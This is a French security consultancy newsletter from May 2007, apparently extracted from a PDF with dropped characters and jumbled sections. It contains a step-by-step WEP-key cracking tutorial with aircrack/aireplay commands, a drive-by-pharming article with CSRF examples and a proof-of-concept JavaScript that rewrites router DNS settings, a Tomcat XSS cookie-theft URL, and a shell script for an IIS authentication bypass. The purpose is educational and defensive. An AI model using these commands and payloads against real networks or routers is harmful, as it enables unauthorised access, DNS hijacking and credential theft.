Professional Documents
Culture Documents
MAI 200
LE
SOMMAIRE
TUTORIAL : CRACK DUNE CLEF WEP SOUS LINUX ET WINDOWS DEMYSTIFICATION DE LATTAQUE Drive-by-pharming LES VULNRABILITS DU MOIS (Microsoft, Notepad++, Winamp, Tomcat) LES OUTILS LIBRES XMCO Partners - 2007
Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est strictement interdite.
[1]
LEDITO
Qui ne sait pas servir ne sais pas jouer..
En ce moment se dispute, entre deux prcipitations, et deux pas de la porte dAuteuil, le tournoi de Roland Garros. Dans ce sanctuaire des Mousquetaires, construit en mai 1928, saffrontent, 79 ans plus tard, les meilleurs joueurs mondiaux. Certains se disent Mais quel rapport avec la scurit informatique ? Aucun, rassurez-vous Remarquez, la rexion, ce sport vhicule des qualits propres notre cabinet. En effet, la prcision, la combativit, la crativit, la technique et la ractivit sont des caractristiques acquises par notre cabinet force de travail des talents qui laniment. Bien sr les objectifs ne sont pas les mmes, nous nenvisageons pas de gagner le Grand Chelem. Notre mission est daider nos clients relever les ds intrinsques la scurisation des systmes dinformations. Revoir ses fondamentaux et ajuster son jeu en fonction de la surface, mnent la polyvalence qui permet de passer de la terre battue au gazon euh plutt des rseaux laires aux communications sans l ou encore aux plateformes mobiles.
MAI 200
tes, lors du jeu prcdent, ne sont pas forcment celles qui permettront de gagner le set en cours. Un excellent joueur est bien plus quun parfait technicien : il est celui qui saura apporter une touche doriginalit dans lexcution de ses gestes et sduire par lefcacit de son jeu. Cest pour cela que nous nous battons pour ne pas tre un cabinet comme les autres et apporter le petit plus qui manque si souvent dans les conseils prodigus aux entreprises en termes de scurit. Quoiquil en soit, sil existe, pour le joueur de tennis comme pour notre cabinet, un critre dcisif, cest bien la qualit du service .
Olivier Patole Consultant XMCO
Il est aussi important pour un joueur de tennis que pour notre cabinet de varier son jeu, de monter au let quand il le faut, de frapper du fond du court ou encore dexcuter un amorti parfait car les rponses appor-
MAI 2007
Nombre de bulletins Microsoft : 7 Nombre dexploits dangereux : 14 Nombre de bulletins XMCO : 140
Dmystification du Drive-by-Pharming................................8
Prsentation de lattaque avec des exemples concrets.
Outils Libres.................................................................................19
Dcouvrez les outils les plus efcaces.
[2]
WWW.XMCOPARTNERS.COM
XMCO
| Partners
ATTENTION...
Lutilisation de ces pilotes empche la carte de fonctionner normalement et donc de se connecter un point daccs sans fil. Notre carte wi est alors prte. Deux choix soffrent vous. En premier lieu, vous pouvez rcuprer aircrack-ng sur le site ofciel. Cependant, la dernire version publie ne nous a pas convaincus (chec sur deux tests mens). Nous prfrons donc utiliser une ancienne version (2.3) fournie dans le pack CrackWepPack.exe qui offre une interface graphique qui vitera de rentrer manuellement les commandes. Ce pack contient WinAircrack (interface graphique pour la version 2.3 daircrack), les outils aircrack, airodump et des dictionnaires pour mener des attaques de Brute-force (WPA). Linterface est simple et seul le premier onglet va nous servir mener lattaque.
2 3
[3]
WWW.XMCOPARTNERS.COM
La premire tape consiste rcuprer les donnes mises sur le rseau Wi. Nous lanons le logiciel WinAircrack puis sur le lien Cliquez ici pour obtenir un chier de capture (1). Nous pouvons alors lancer airodump (2) via un lien prsent dans la nouvelle fentre afche.
Nous prcisons la carte Wi, le canal couter et le chier de sortie qui stockera les paquets sniffs. Lcoute est lance. Il ne nous reste plus qu attendre quun certain nombre de paquets soit rcupr. Il faut savoir quaucun driver sous Windows ne permet de gnrer du trac sur un rseau dit passif et dinjecter, dans le mme temps, des donnes. Cest la raison pour laquelle, le crack de clef Wep sous Windows est plus long et, par la mme, plus laborieux. Dans notre cas, un ordinateur connect au point daccs tlcharge un divx. Il nous a fallut quelques minutes pour rcuprer les 373000 paquets ncessaires au cassage de la clef comme le montre la capture suivante.
Dans le mme temps, nous pouvons lancer aircrack en cliquant sur le bouton Aircracker la clef (3). Il nous suft seulement de rentrer trois informations (ESSID- adresse Mac du point daccs - chier de capture). Le logiciel utilise ensuite ces donnes pour lancer la mme commande que nous verrons par la suite pour Linux.
[4]
WWW.XMCOPARTNERS.COM
Une fois les drivers madwi installs, la premire tape consiste congurer notre carte en mode monitor (mode passif qui coute tout le trac mis). Pour Backtrack exclusivement, certaines cartes ncessitent dexcuter deux commandes (petite astuce qui pourrait vous bloquer) avec loutil airmon-ng:
INFO...
Une peinture murale permet de contrer les attaques pirates lencontre des connexions sans l...
La socit EM-SEC vient d'annoncer la commercialisation imminente d'une peinture qui permet de contrer les intrusions informatiques... En effet, une simple peinture, mise au point par le laboratoire de recherche de cette socit amricaine, permet de bloquer les ondes radio (Wifi, GSM). Ce procd lectro-magntique peut s'appliquer sur de nombreux matriaux (bois, mtal, plastique...) et intervient comme une simple protection passive (aucun brouillage radio). En appliquant une seule couche de peinture, les entreprises peuvent maintenant isoler compltement leurs rseaux contre les intrusions de ce genre. Nous obtenons ce rsultat: Nous sommes alors prt commencer lattaque. Comme nous lavons expliqu, trois outils vont tre utiliss en parallle : airodump pour sniffer les paquets, aireplay , pour rejouer et stimuler le rseau, et aircrack. Dans un premier temps, nous coutons le rseau avec la commande suivante: Airodump <interface rseau>
[5]
Vous pouvez simplement utiliser la commande: Relanons prsent airodump de manire ce quil se focalise sur les paquets mis sur le canal 11. Par ailleurs, prcisons un nom de chier dans lequel les informations sniffes seront crites. Le chier gnr aura lextension.cap et sera ensuite utilis par les deux autres outils. Airodump-ng channel <Numro du canal> write <Nom du fichier de sortie> <Interface> Aircrack <Nom du fichier de capture> Aircrack analysera le chier et vous demandera la cible si plusieurs paquets de diffrents points daccs ont t trouvs.
Si le rseau audit est sollicit (tlchargement, surf sur Internet de plusieurs ordinateurs), le nombre de paquets peut slever rapidement. Dans notre cas, nous avons lanc un tlchargement de chiers, en 1 minute nous avons rcupr 70000 paquets. Si le rseau cibl nest pas utilis, il suft de rcuprer quelques paquets que nous allons rejouer avec le programme aireplay . Deux possibilits sont offertes. Nous pouvons simuler une authentication (Fake Authentication Attack) ou injecter des paquets ARP. Nous utilisons les paramtres -1 0 puis les autres options -a,-b et h.
Vous pouvez galement utilis la commande complte: Aircrack a -1 e <Nom du point daccs> b <Adresse MAC de l'AP> <Nom du fichier de capture>
Quelques secondes plus tard (11s), nous obtenons la clef : Fake authentication
Aireplay -1 0 a <Adresse MAC de l'AP> b <Adresse MAC de l'AP> h <Adresse MAC de notre carte Wifi> e <Nom du point daccs> ath0
Injection de paquets: Aireplay -3 e Nom du point daccs a adresse MAC de l'AP h adresse MAC de notre carte Wifi x 600 r nom du fichier de capture Interface
Une fois un certains nombre de paquets rcuprs, dans notre cas plus de 700 000, nous pouvons lancer, en parallle, aircrack qui va procd une analyse des IV faibles en lisant le chier actu_secu_labs.cap et trouver la clef WEP.
[6]
WWW.XMCOPARTNERS.COM
INFO...
Des attaques qui peuvent coter cher
Les faiblesses du WEP peut avoir des consquences financires importantes comme le montre un exemple rcent. Le mois dernier, la socit de distribution TJX a, enfin, ralis quune intrusion avait eu lieu au sein de son systme dinformation. Le hacker avait, 18 mois auparavant, casser la protection WEP mise en place dans un magasin appartenant la chane pour ensuite couter le rseau et ce, afin de rcuprer des mots de passe du serveur central. Les pirates schangeaient des informations en laissant des messages en clair dans les logs afin de se rpartir le travail. Bilan : prs de 46 millions didentits bancaires ont t subtilises, le record de ce genre de fraude. Le gang a t arrt mais a tout de mme pu effectuer pour plus de 8 millions de dollars dachat avec les comptes bancaires rcuprs.
De plus, il est possible de tomber sur des clefs prdictibles. Ce fut le cas lors dun de nos test dintrusion. Les administrateurs avaient choisies la clef Hexadcimale: 00:01:02:03:04:05: Au bout de quelques secondes, aircrack avait identi les octets 00, 01, 02. Nous avons simplement tent la suite logique et cela sest avr correcte!
Conclusion
Le protocole WEP est mort il y a quelques annes mais les dernires recherches lont dnitivement enterr. Le cassage de clef WEP est aujourdhui simple, facile et multi platesformes. Les attaques peuvent tre menes par des personnes inexprimentes. Ceci devrait forcer les entreprises comme les particuliers scuriser davantage leurs accs sans ls.
[7]
WWW.XMCOPARTNERS.COM
Bibliographie
DEMYSTIFICATION DU DRIVE-BY-PHARMING
XMCO | Partners
De rcentes recherches ont t menes par Symantec et luniversit dIndiana sur la scurit des routeurs personnels. Lattaque que nous allons vous prsenter est, en partie, lie aux attaques CSRF prsentes au mois de Mars 2007 (article CSRF). En rsum, le but de cette technique est dinciter la victime cliquer sur un lien dissimulant un code qui sexcutera partir du navigateur et qui sera donc totalement lgitime au vue des quipements cibls. Entrons dans les dtails du Drive-By-Pharming Dnition Le CSRF (Cross Site Request Forgery) Avant de nous lancer dans la description dtaille du Drive-by-Pharming, il est important de comprendre la notion dattaque CSRF. Le CSRF est une technique dattaque qui consiste inciter une victime potentielle suivre un lien ou visiter un site malicieux. Le pirate va camouer un code malicieux au sein du lien HTML ou dans le code de la page HTML visite. Le but est de forcer le navigateur de la victime envoyer une requte silencieuse l'insu de linternaute. Cette mthode peut facilement tre mise en place avec des balises img au sein dune page HTML.
En visitant un site web contenant la balise suivante, un internaute, pralablement loggu sur un site dachat en ligne, peut tre forc excuter un achat sans en avoir fait la demande <img src=http://www.achat-en -ligne.com/index.php?buy=tv&nb=50&co nfirm=1> Un article dtaille les attaques CSRF dans le numro 11 de lActu-Secu. [1] Quest ce que le pharming??? Un autre terme doit tre compris avant daborder le corps de cet article. Le but de cette manipulation est de corrompre la base dun serveur DNS an dy injecter de fausses entres. Ainsi, imaginons que vous souhaitiez consulter vos comptes sur le site www.votrebanque.com qui hberge sur un serveur possdant l'IP 193.10.10.10. Une demande est alors envoye au serveur DNS pour vous fournir cette adresse IP (193.10.10.10) an que vous puissiez vous connecter au site de votre banque. [8]
WWW.XMCOPARTNERS.COM
L'attaquant intervient ici et modiera le cache du serveur DNS an de remplacer l'adresse IP du serveur de votre banque (193.10.10.10) avec une adresse IP d'un serveur pirate (1.1.1.1) qui hbergera un site web similaire a celui de votre banque. Ainsi lorsque votre demande sera traite par le serveur DNS, ce dernier vous enverra l'adresse IP du serveur pirate (1.1.1.1). L'utilisateur, certain d'tre connect sur le site de sa banque (lurl correspond bien ladresse du site web de sa banque), peut donc facilement se faire piger et ses donnes sensibles pourront alors tre recueillies par la personne mal-intentionne (via une attaque de Phishing). Intressons nous maintenant au Drive-By-pharming qui utilisent ces deux techniques dattaque. Le Drive-by-Pharming Le Drive-by-Pharming est une association des deux notions voques ci-dessus et exploitables sur des routeurs (gnralement personnels) qui grent la conguration DNS des postes clients connects sur le rseau local. Ainsi ds quun de vos ordinateurs personnels se connecte un site web, le routeur utilise le serveur DNS congur pour effectuer la translation URL --> IP. Le but de lattaque va tre de forcer la victime modier sa conguration DNS en lincitant visiter un site web ou suivre un lien envoy par e-mail. Le Drive-by-pharming nexploite aucune vulnrabilit du navigateur,. Cette technique utilise seulement les proprits du Javascript an de sauthentier sur le routeur vulnrable puis de changer la vole la conguration DNS. Il faut savoir que la plupart des routeurs/Modem ADSL utilise des mots de passe par dfaut lors de la connexion linterface dadministration ce qui rend lattaque possible. Sur chacun de ces quipements, une interface web permet de grer toute sorte doptions ou dobtenir des informations sur la conguration : conguration Wi, tat de la connexion Internet, conguration DNS, redirection de ports. La thorie Lattaque basique : un lien HTML malicieux Les attaques les plus simples consistent envoyer un e-mail contenant un code HTML camou. Le pirate espre que la victime va suivre le lien qui la dirigera en fait vers linterface de son routeur. La requte aura pour objet de sauthentier sur linterface du routeur et de changer la conguration DNS tout cela au sein de la mme requte. Elaboration dune page HTML spcialement conue La seconde possibilit consiste crer une page HTML malicieuse contenant un code Javascript qui sera excute par le navigateur lorsque la victime ira visiter le site pirate en question.
Comme vous le voyez sur la capture prsente cidessus, un lien lapparence inoffensive est propos la victime. Ce dernier ne dirige pas lutilisateur vers http://www.banque-en-ligne.fr mais tente dexcuter une requte directement sur le routeur personnel de la victime:
http://admin:admin@192.168.1.1/dns=1 Dans cette attaque basique, le pirate connat plusieurs informations sur la victime. Premirement ladresse IP du routeur cibl. Lattaquant sait ou espre que le routeur de sa victime possdera ladresse 192.168.1.1 et que la victime naura pas modi les identiants daccs linterface de conguration de sa box. Par ailleurs, le pirate connat galement le type de routeur ncessaire pour tre mme dexcuter la requte approprie qui changera les paramtres DNS. Vous avez compris que cette attaque est particulirement cible et na aucune chance dtre exploite grande chelle. Etudions prsent une autre possibilit plus volue qui pourrait bien faire davantage de victimes.
[9]
WWW.XMCOPARTNERS.COM
La premire tape consiste inciter la victime visiter la page qui contient un code javascript.
Dans un premier temps, le code Javascript va rcuprer ladresse IP du poste de la victime et en dduire ensuite ladresse IP du routeur. Pour cela, plusieurs fonctions Javascript vont permettre de mener bien notre attaque. Le pirate va utiliser un code (trouv en quelques minutes sur Internet) qui dcouvre ladresse locale de la victime (dans notre cas, le code fonctionne sur Firefox uniquement). La plupart des routeurs du march est congur de manire attribuer aux clients des adresses du type 192.168.0.2-254, 192.168.1.2-254 ou encore 192.168.10.2-254. Par consquent, ladresse du routeur sera 192.168.0.1, 192.168.1.1 ou encore 192.168.10.1. Une fois lIP du routeur dduite, plusieurs tests seront effectus sur des ressources propres au routeur an de dterminer quel quipement possde la victime. En effet, chacun des routeurs du march possde des logos ou des images personnalisesutilises pour gayer linterface dadministration.
UI_Linksys.gif
dsl604.jpg
oorPro_orange.gif
logo-n9euftelecom.gif
Le code Javascript va donc effectuer des tests sur ces images et excuter des commandes adquates si limage est charge ou bien si une erreur est survenue. Une fois ladresse du routeur identie, il reste maintenant trouver un couple login/mot de passe valide. Les routeurs les plus utiliss du marchpossdent des mots de passe faibles lorsque ces quipements sont fournis aux particuliers. Ltape matresse va tre de sidentier sur le routeur en question. Les diffrents login et mots de passe utiliss par les fournisseurs daccs et les diteurs dquipements rseau sont disponibles sur Internet comme le montre la capture suivante.
[10]
WWW.XMCOPARTNERS.COM
Il ne reste plus qu sauthentier sur linterface avec les identiants appropris. NB: Seuls les routeurs qui possdent des identiants par dfaut sont vulnrables cette attaque. Enn, la dernire tape va consister excuter une requte dans le but de changer la conguration DNS. En effet,il est possible de sauthentier sur un routeur personnel de cette manire: http://login:mot_de_passe@192.168.1.1 Lutilisation dune balise src ou img provoquera lenvoi dune requte classique et permettra de changer la conguration du routeur cibl. <script src=http://192.168.1.1/index.php?dns=1.1.1.1> </script> Certains routeurs ncessiteront un redmarrage pour prendre en compte les modications. Une fois de plus, un appel du script en question sufra.
Une fois les paramtres du routeur modis, tout le trac DNS est contrl par les pirates. Lutilisateur croit naviguer sur des sites web lgitimes alors quil est redirig vers des sites malveillants.
[11]
WWW.XMCOPARTNERS.COM
Les possibilits offertes aux attaquants De nombreuses possibilits sont offertes aux attaquants. Voici les principaux risques lis lexploitation de ce genre dattaque Modication de la conguration DNS Le mot Drive-by-Pharming insiste sur le changement de la conguration DNS. Une fois lattaque russie, les pirates matrisent totalement la translation IP nom de domaine et peuvent donc rediriger les victimes vers les sites de leurs choix. Attaque de Phishing Comme nous vous lavons prsent dans la dnition du pharming, la modication des serveurs DNS utiliss par la victime va entraner une redirection des sites critiques vers un site pirate. En demandant www.banque-en-ligne.com, la victime sera alors redirige vers un site aux couleurs du site lgitime an de mener une attaque de Phishing et voler ses identiants. Corruption des mises jour Windows Update On peut galement imaginer que les attaquants empchent le fonctionnement de Windows Update et interdisent les mises jour. Redirection vers des sites hbergeant des malwares Enn les attaquants pourront crer des sites an dinciter les victimes tlcharger des contenus lapparence lgitime. Un exemple intressant serait de crer le site tlcharger.com et de proposer sur la page daccueil des logiciels attrayants (qui sont en fait des malwares) ou encore de proposer des logiciels de scurit sur un faux site bancaire. Autres malversations... Cependant dautres menaces planent au dessus de telles quipements. Linterface web permet galement de congurer la redirection de port, de grer la conguration sans-ls ou de mettre en place des mthodes de chiffrement sans ls (WEP, WPA). On peut donc imaginer plusieurs scnarii dintrusion.. Un pirate connat ladresse MSN de son voisin. Il lui envoie un lien menant vers un site contenant ce code Javascript malicieux. Le code envoie une requte sur linterface de son routeur et active la connexion Wi ou dsactive la protection WEPeuh non !! WPA maintenant que vous avez saisis les enjeux de la protection des rseaux sans-ls ;-). Le pirate possde toutes les cartes en main pour accder simplement votre rseau et venir fouiller dans vos documents personnels ou encore pour proter de votre accs internet pour aller pirater des sites web
Le Javascript permet galement de dcouvrir un rseau en lanant un scan du rseau local ou encore activer linterface web accessible depuis InternetEn dautres mots, la plupart des fonctionnalits offertes par le routeur peuvent tre utilises et modies. La pratique Les limitations du javascript Maintenant que lattaque est dnie, passons aux limitations de ce type dattaque. Les forums et les sites spcialiss ont relay massivement les risques dcrits ci-dessus sans tudier avec attention tous les arguments prsents dans le white paper Drive-by-Pharming. La mthode prsente dans le paragraphe prcdent nest pas si facile mettre en uvre pour plusieurs raisons. En effet, les chercheurs, auteurs du white paper Drive-by-pharming , ont propos la technique la plus simple qui peut tre simplement rfute lorsque celle-ci est dveloppe en javascript. Aprs avoir attentivement lu et chercher les informations sur le Drive-by-pharming, nous avons t en mesure de crer une preuve de concept qui vous est prsente dans le paragraphe suivant. Nous avons rencontr quelques difcults pour manipuler le routeur personnel de la victime aussi simplement que les mdias lont dcrit. Premier point, les victimes potentielles doivent utiliser le navigateur Firefox pour que lattaque soit parfaitement russie. En effet, Internet Explorer ne permet pas de rcuprer simplement ladresse IP interne de la victime. Ladresse du routeur ne peut donc pas tre dduite. Le pirate doit alors crer un code Javascript spcique pour chacun des routeurs. Second point, lauthentication ne peut plus tre ralise directement avec une url de la forme http://login:mdp@adresse_IP. En insrant une balise src ou img, la requte ne pourra tre effectue immdiatement que si lutilisateur nest pas pralablement loggu sur son interface. Firefox demande lutilsiateur de valider avant dexcuter une telle requte. Une boite de dialogue proposera la victime de se logguer sur le routeur. Lattaque peut nanmoins russir si la victime nest pas vigilante ou si les identiants ont t enregistrs au sein du navigateur. Enn la modication DNS nest possible que sur les routeurs personnels. Les box (neufbox, livebox, alicebox) qui sont le plus souvent utilises par les particuliers reoivent automatiquement la conguration DNS de leur fournisseur daccs. Tous ces problmes limitent donc fortement les chances de succs de ce genre dattaque
[12]
WWW.XMCOPARTNERS.COM
Dautres mthodes plus volues sont tout de mme envisageables. Pour cela, il faut dvelopper une applet java signe qui accde aux informations du poste cibl et peut lancer des requtes authenties sur lapplication. Ce genre de technique fonctionne sur Internet Explorer comme sous Firefox en visitant galement une page web. Cependant, cette mthode sort du scope de notre tude. En effet, lutilisateur doit prsent valider une boite de dialogue pour que lapplet soit correctement excute. La preuve par lexemple Essayons, prsent, dexploiter ces faiblesses avec la cration dune page web malicieuse. Comme nous lavons expliqu, les routeurs les plus utiliss en France sont des box et ne proposent pas dimposer la conguration DNS. Nous avons donc test notre attaque sur deux routeur/wi Linksys et Netgear qui sont vulnrables au Drive-by-pharming . An de simplier la lecture de notre preuve de concept, nous avons choisi de raliser un test bi-
naire. Notre code effectuera un test an de savoir si notre victime utilise un routeur Linksys. Dans le cas contraire, nous concluerons que la victime utilise un routeur Netgear. Comme nous lavons expliqu, lattaque ncessite quun utilisateur soit pralablement authenti sur le routeur en question. Nous esprons alors que les cookies de session de notre victime sont toujours valides Par ailleurs, nous avons choisi de cibler le navigateur Firefox qui laisse des possibilits plus intressantes au pirate. En effet, nous sommes ici en mesure de tester le routeur utilis par la victime et de choisir dexcuter un code appropri. En ciblant les utilisateurs dInternet Explorer, le code na plus grand intrt : les seules possibilits sont denchaner des requtes la suite sans sadapter au contexte. Voici le code de notre preuve de concept. Cette dernire est une simple bauche et pourrait tre videmment plus aboutie
[13]
WWW.XMCOPARTNERS.COM
AttackAPI.Client = {}; AttackAPI.Client.getAddressInfo = function () { var hostname = undefined; var address = undefined; try { var sock = new java.net.Socket(); sock.bind(new java.net.InetSocketAddress('0.0.0.0', 0)); sock.connect(new java.net.InetSocketAddress(document.domain, (!document.location.port)?80:document.location.port)); var hostname = sock.getLocalAddress().getHostName(); var address = sock.getLocalAddress().getHostAddress(); } catch (e) {} return {hostname: hostname, address: address}; };
switch (IP_routeur) { case "192.168.1.1": var img = new Image(); img.src = "http://"+ adresse_routeur + "/UI_Linksys.gif";
Si limage UI_Linksys.gif nest pas correctement charge, alors la victime utilise un routeur Netgear
img.src = "http://"+ adresse_routeur +"/setup.cgi?DSLencapsulation=pppoe&pppoeName=XXXX&pppoePasswd=XXXX&pppoeService=&pppoeIdl eTime=0&WAN_ipType=Dynamic&pppoeip1=&pppoeip2=&pppoeip3=&pppoeip4=&DNStype=Fixed&DNS1addre ss1=1&DNS1address2=1&DNS1address3=1&DNS1address4=1&DNS2address1=&DNS2address2=&DNS2address 3=&DNS2address4=&natEnable=enabled&apply=Appliquer&h_DSLencapsulation=pppoe&wan_login=setu p.cgi%3Fnext_file%3Dpppoe.htm&h_natEnable=enabled&h_WANlogin=enable&h_DNStype=Dynamic&c4_D NS1address=&c4_DNS2address=&runtest=&todo=save&c4_pppoeip=&h_WAN_ipType=Dynamic&this_file= pppoe.htm&next_file=basic.htm"; }; Si limage UI_Linksys.gif est correctement charge, alors la victime utilise un routeur Linksys
[14]
WWW.XMCOPARTNERS.COM
img.onload = function() { alert('Vous possdez un routeur Netgear'); Excution de la requte adquate affiche_info (); img.src = "http://"+ adresse_routeur +"/apply.cgi?submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&d aylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&wan_proto=dhcp&router_name=WRT54G&wa n_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ ipaddr_3=1&lan_netmask=255.255.255.0&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50 &dhcp_lease=0&wan_dns=4&wan_dns0_0=1&wan_dns0_1=33&wan_dns0_2=1&wan_dns0_3=1&wan_dns1_0=0& wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0 &wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_dayligh t_time=1";
CODE SUITE...
alert('Votre configuration DNS a t chage...Hacked...');
img.src = "http://"+ adresse_routeur +"/setup.cgi?todo=reboot&this_file=diag.htm&next_file=diag.htm ";
};
break;
case "192.168.0.1":
//Mme code
break;
case "192.168.2.1":
//Mme code
break;
default:
document.write("ECHEC");
break; } alert('Dmonstration termine'); </script> </body> </html>
Autres cas
Le javascript possde de fortes contraintes pour mener bien ce genre dattaque. Certains pourrait penser lutilisation de lobjet XMLHTTP qui est souvent utilis en Ajax pour lancer des requtes HTTP. Cependant cette fonctionnalit se limite au domaine visit et ne peut atteindre le routeur personnel de la victime. Conclusion Le Drive by pharming est une technique dattaque qui a peu de chance daboutir lorsque celle-ci utilise un code Javascript. En effet, la victime doit tre authentie sur linterface du routeur ce qui est relativement rare. De plus, seuls les routeurs vendus par les diteurs spcialiss sont vulnrables au chargement de la conguration DNS. De leur ct, les Box (neufbox, alicebox, livebox...) ne sont pas vulnrable au changement de conguration DNS mais peuvent tout de mme tre vulnrables au changement de certains paramtres. Nous avons test avec succs la dsactivation de la protection WEP ou WPA mise en place sur deux des quipements les plus utiliss du march. De la mme manire, il serait possible douvrir des ports, changer les identiants pppoe an de causer un dni de service ou autres malversations. Le Javascript peut donc, sous certaines conditions, devenir dangereux (voir article de Jeremiah Grossman) mais reste limit dans le cas du Drive-by-Pharming. Cependant, lutilisation dune applet ou dun ActiveX change la donne. En effet, en dveloppant une applet Java signe, lenvoi de requtes GET et POST devient possible condition que lutilisateur valide cette applet. Lattaque devient alors dangereuse. Les enttes HTTP peuvent tre facilement forges (comme le paramtre Authorization) et lauthentication ne devient plus un problme....
Bibliographie [1] White-Paper de Sid Stamm, Zulkar Ramzan et Markus Jakobsson http://www.symantec.com/avcenter/reference/Driveby_Pharming.pdf [2] Vido explicative sur lattaque
http://www.symantec.com/enterprise/security_response/weblog/2007/02/driveby_pharming_how_clicking_1.html
[3] Prsentation de Jeremiah Grossman Hacking Intranet Website from outside https://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Grossman.pdf
[15]
WWW.XMCOPARTNERS.COM
Cette attaque a t lgrement surexpose par les mdias et ne doit pas inquiter les Internautes franais...En revanche les internautes doivent continuer de rester vigilants lorsque des botes de dialogues apparaissent...ce qui est loin dtre le cas...(un utilisateur sur deux valide les botes de dialogue sans mme lire leurs contenus).
XMCO | Partners
Correctifs Microsoft
Ct Client
Internet Explorer et la suite Ofce ont subi quelques modications avec lapplication des correctifs MS07023, MS07-024 et MS07-025 et MS07-027. La premire partie des problmes concernait Ofce. Lors du traitement de chiers malforms, des dbordements de pile pouvaient tre exploits an de prendre le contrle du systme vulnrable. Internet Explorer a galement t mis jour. Ce correctif cumulatif corrigeait plusieurs problmes dont des erreurs lors du traitement de chiers COM ou de pages contenant des proprits malformes.
traitement des emails contenant du script en pice jointe par le composant "Outlook Web Access". Cette erreur permettait un attaquant de mener des attaques de Cross-Site Scripting en incitant un utilisateur ouvrir un email malicieux via l'interface web du serveur de messagerie. Microsoft Exchange Server 2007 n'est pas affect par cette faille de scurit. Par ailleurs, la faille de scurit RPC DNS qui avait fait parler delle en Avril 2007 a t corrige. Un mois aprs la publication de la vulnrabilit et de lexploit, le problme est devenu obsolte.
Le logiciel Exchange tait galement affect par plusieurs problmes. La premire faille de scurit provient du mauvais dcodage de certains messages MIME. En envoyant un courrier judicieusement conu et encod en base64, un pirate pouvait excuter du code malicieux avec les privilges SYSTEM sur le serveur vulnrable. Deux autres vulnrabilits permettaient un attaquant d'altrer le fonctionnement du service de messagerie. Ces failles provenaient d'un mauvais traitement de certaines requtes IMAP et de chiers iCal malforms. Enn, la dernire vulnrabilit provient d'un mauvais
[16]
WWW.XMCOPARTNERS.COM
Ct Serveur
INFO...
Et le Phishing revient en force...
Aprs quelques mois relativement calmes (fin d'anne 2006), les attaques de Phishing sont de nouveau en vogue. Selon un rapport publi par l'APWG (Anti-Phishing Working Group), plus de 55000 sites malveillants ont t identifis au mois d'Avril 2007 contre 20871 au mois de Mars, soit une hausse de 166%. Les Etats-Unis, la France et la Rpublique de Core sont les pays qui hbergent le plus ce genre de sites web et plus de 90% des attaques ciblent des tablissements financiers. Cette hausse s'expliquent par la mises en place de protection antiphishing sur les principaux navigateurs du march. Les pirates tentent de multiplier la cration de tels sites dans le but de devancer ces outils et donc piger les utilisateurs avant que le site web soit blacklist. Dernire statistique intressante, la dure de vie d'un site pirate est passe de 5 jours en janvier 2006 3 jours en avril 2007.
pliA/%2e%2e/appliB/. Tomcat traduira nalement l'URI en /appliA/../appliB/. Quelques jours plus tt, une vulnrabilit de Cross Site Scripting tait galement identie au sein du mme serveur. Les entres utilisateurs passes lors de la consultation de la documentation ntaient pas correctement contrles avant dtre pris en compte par le serveur web. En utilisant une url comme celle prsente ci-dessous, le pirate pouvait injecter du code Javascript ct client et donc de voler le cookie de session d'un utilisateur connect. Exemple: http://server/tomcat-docs/appdev/sam ple/web/hello.jsp?test=<script>alert (document.cookie)</script>
IIS
Deux exploits ont t publi durant ce mois de Mai pour les serveurs web IIS. Ces derniers ont mis en vidence deux erreurs de dveloppement sur des versions IIS 5.0/5.1 et 6.0. Le premier vise la version 6 et permettait denvoyer de nombreuses requtes GET en demande de ressources /AUX/.aspx ce qui a pour consquence de ralentir le fonctionnement du serveur et donc de causer un dni de service. Le problme na pas t corrig par Microsoft. NB: Seuls les serveurs renvoyant une erreur Runtime error sont concerns par ce problme. En n de mois, un programme malicieux visant le serveur HTTP IIS a t publi. Ce dernier exploite une faille de scurit dcouverte au sein de la fonctionnalit "hit highlight" (Webhits.dll). En utilisant ce programme, un pirate est en mesure de contourner l'authentication basic et accder des ressources protges sans mme tre authenti.
[17]
WWW.XMCOPARTNERS.COM
CODE ...
#!/bin/sh if [ $# != 2 ] then printf "USAGE:\t\t$0 <Site> <Protected Object>\nExample:\t$0 http://www.microsoft.com /en/us/default.aspx\n\n"; exit 0 fi site=$1 protectedObject=$2 evil=$site'/shao/null.htw?CiWebhit sfile='$protectedObject'&CiRestric tion=b&CiHiliteType=full' lynx -dump $evil
ouvrir un tel chier contrefait, un pirate peut provoquer un dbordement de tampon et ainsi compromettre une machine implmentant Notepad++. Un code malicieux a t publi. Ce dernier permet de gnrer un chier ruby malicieux qui permettra de lancer la calculatrice ds que le chier sera dit avec Notepad++.
INFO...
La faille Quicktime dcouverte lors dun concours...
Deux experts en scurit viennent de dcouvrir une vulnrabilit "0-day" lors d'un concours organis la confrence CanSecWest. Un ordinateur implmentant Mac OS X et mis jour tait laiss la disposition des participants. Le but tait de trouver une faille systme mais personne n'a russi contourner la protection du Mac. Cependant Shane Macaulay et Dino Dai Zovi ont russi prendre le contrle du systme cibl via une faille de scurit prsente au sein de logiciel Quicktime. La simple visite dun site malicieux engendre lexploitation de la vulnrabilit.
Exploits 0-day
Quelques programmes intressants ont galement t publis. Trois exploits ont attir notre attention . Ces derniers ciblaient les logiciels multimdia Quicktime (voir encadr) et Winamp.
Winamp
Winamp est un des logiciels audio les plus utiliss. La dcouverte dune faille de scurit en dbut du mois de Mai a t exploite largement sur Internet. En effet, un programme a t rapidement publi pour la version 5.34. Lexploit permet de crer un chier MP4 qui, une fois lu avec le player Winamp, va permettre douvrir un port en coute.
Les diteurs de texte ne sont pas souvent cibls par des vulnrabilits. En effet, ces derniers relativement simples et correctement dvelopps ne posent pas de problmes particuliers. Notepad++ chappe la rgle. Une vulnrabilit a t identie au sein de ce logiciel libre. Le problme rsulte d'une erreur du module "SciLexer.dll" qui se manifeste lors du traitement de scripts ruby malforms. En incitant un utilisateur
[18]
WWW.XMCOPARTNERS.COM
Notepad++
OUTILS LIBRES
